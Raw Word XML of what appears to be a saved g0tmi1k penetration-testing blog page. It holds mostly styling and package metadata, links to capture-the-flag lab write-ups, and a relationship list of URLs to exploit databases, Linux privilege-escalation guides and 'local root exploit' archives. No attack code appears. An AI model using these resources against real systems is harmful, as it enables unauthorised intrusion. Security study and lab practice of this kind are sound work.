    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:proofErr w:type="spellStart"/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Kioptrix</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> - Level 4 (Limited Shell)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:proofErr w:type="spellStart"/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Hackademic</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0096257E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 xml:space="preserve"> RTB2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="6B6B6B"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="228600" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="RSS Feed">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId53" tooltip="&quot;RS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SS Feed">
                      <a:hlinkClick r:id="rId53" tooltip="&quot;RS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57E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="6B6B6B"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="228600" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="GitHub Profile">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId55" tooltip="&quot;GitHub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Profile">
                      <a:hlinkClick r:id="rId55" tooltip="&quot;GitHub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57E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="6B6B6B"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="228600" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Twitter Profile">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId57" tooltip="&quot;Twitt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itter Profile">
                      <a:hlinkClick r:id="rId57" tooltip="&quot;Twitt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57E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="6B6B6B"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="228600" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Google Plus Profile">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId59" tooltip="&quot;Google Pl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ogle Plus Profile">
                      <a:hlinkClick r:id="rId59" tooltip="&quot;Google Pl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57E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Copyright © 2009-2019 g0tmi1k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3807" w:rsidRDefault="006F3807"/>
    <w:sectPr w:rsidR="006F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7962"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD4C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F2516"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3A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96DC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09CA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6A0A8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="906E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7E"/>
    <w:rsid w:val="006F3807"/>
    <w:rsid w:val="0096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9754"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1B5FFB55-3FE9-466A-B944-D2827E26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2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2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625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5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25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6257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96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25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257E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25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257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25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257E"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="meta">
    <w:name w:val="meta"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0096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257E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="009625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57E"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line-number">
    <w:name w:val="line-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0096257E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6257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="err">
    <w:name w:val="err"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m">
    <w:name w:val="m"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sb">
    <w:name w:val="sb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="se">
    <w:name w:val="se"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="byline">
    <w:name w:val="byline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fn">
    <w:name w:val="fn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="date">
    <w:name w:val="date"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="date-month">
    <w:name w:val="date-month"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="date-day">
    <w:name w:val="date-day"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="date-suffix">
    <w:name w:val="date-suffix"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="date-year">
    <w:name w:val="date-year"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="time">
    <w:name w:val="time"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="categories">
    <w:name w:val="categories"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="post">
    <w:name w:val="post"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0096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sidebar">
    <w:name w:val="toggle-sidebar"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0096257E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="credit">
    <w:name w:val="credit"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00962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3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FBFBF"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1007291230">
              <w:marLeft w:val="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0E0E0"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="21023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5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ecuriteam.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclists.org/fulldisclosure/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0daysecurity.com/penetration-testing/enumeration.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/dvwa/bruteforce-medium/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.archive.org/web/20111118031158/http:/tarantula.by.ru/localroot/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/07/pentesting-with-backtrack-pwb/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/dvwa/index/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/09/21ltr-scene-1/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/g0tmi1k" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.boutell.com/rinetd/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://metasploit.com/modules/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/dvwa/login/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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anmaster53.com/2011/05/7-linux-shells-using-built-in-tools/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://labs.portcullis.co.uk/application/enum4linux/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/commands/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/dvwa/bruteforce-low/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/atom.xml" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploitsearch.net/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/unix-privesc-check/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-local-file/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/g0tmi1k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thegeekstuff.com/2011/08/linux-var-log-files/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/bypassing/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/" TargetMode="External"/><Relationship Id="rId6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downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microloft.co.uk/hacking/hacking3.htm" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/de-icenet-v12a-120a-level-1-disk/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2014/01/offensive-security-wireless/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/09/stripe-ctf-20-web-edition/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-limited-shell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337day.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securityreason.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bastille-linux.sourceforge.net/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/privilege-escalation/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/dvwa/bruteforce-high/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://plus.google.com/110108403609022118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2599</Words>
  <Characters>14820</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>123</Lines>
  <Paragraphs>34</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17385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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-04T16:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-04T16:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>